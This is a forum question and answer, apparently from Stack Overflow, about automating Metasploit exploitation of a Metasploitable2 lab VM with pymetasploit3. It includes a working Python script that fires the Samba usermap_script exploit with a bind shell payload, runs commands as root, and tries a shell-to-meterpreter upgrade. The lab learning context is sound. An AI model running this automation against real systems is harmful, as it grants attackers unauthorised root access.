-1

I am trying to get a meterpreter shell open on the metasploitable2 VM by running a python script on my Kali VM. All are connected to the same internal nat-network.

My goal for ethical hacking is to try and perform automation (pymetasploit3) of exploitation and post-exploitation.

I am so far able to use my python3 script, which imports the library pymetasploit3.msfrpc, with additional use of the msfconsole to open a session and issue normal Linux terminal commands.

My exploitation code: (test2.py)

import time 
from pymetasploit3.msfrpc import MsfRpcClient 
client = MsfRpcClient('mypassword', port=55552)
exploit = client.modules.use('exploit', 'multi/samba/usermap_script') #defining exploit to use
exploit['RHOSTS'] = "10.0.2.4" #metasploitable VM
exploit['RPORT'] = "139" #samba port
exploit.target = 0
payload = client.modules.use('payload', 'cmd/unix/bind_perl') #defining exploit's payload to use
payload['LPORT'] = 4444
time.sleep(10) #allow time for msfconsole to open command session
exploit.execute(payload=payload)
shell = client.sessions.session(list(client.sessions.list.keys())[0])
shell.write('whoami') #issuing commands to now opened shell
print(shell.read()) #result = root
shell.write('hostname') 
print(shell.read()) #result = metasploitable

I have been following this guide for meterpreter escalation

My post-explotation code (continues on from pervious code in test2.py):

payload1 = client.modules.use('payload', 'multi/manage/shell_to_meterpreter') #same explotation but different payload
payload1['LPORT'] = 8080
payload1['SESSION'] = 1
exploit.execute(payload=payload1)
shell = client.sessions.session('1')
shell.write('whoami')
print(shell.read())
shell.write('hostname')
print(shell.read())

The result from msfconsole (including initial setup and result):

msfconsole #loads...
load msgrpc Pass=mypassword
#MSGRPC success messages
#loaded plugin: msgrpc
Command shell session 1 opened (0.0.0.0:0 -> 10.0.2.4:4444) at... #normal shell session active

Running the actual python code (test2.py): code output Line 197 refers to:

payload1 = client.modules.use('payload', 'multi/manage/shell_to_meterpreter')

I am wondering what is the correct way to do this post-exploitation automation properly, and why the second payload is not working...

Also if there is an easier way to get meterpreter open also using a similar automation method, open to suggestions. Thanks

Amir Afianian
  • 2,679
  • 4
  • 22
  • 46
CHOCO BLOCK
  • 93
  • 7

1 Answers1

0

So lots of things were wrong but the solution was to run it in a separate script, then to switch into the meterpreter session.

CHOCO BLOCK
  • 93
  • 7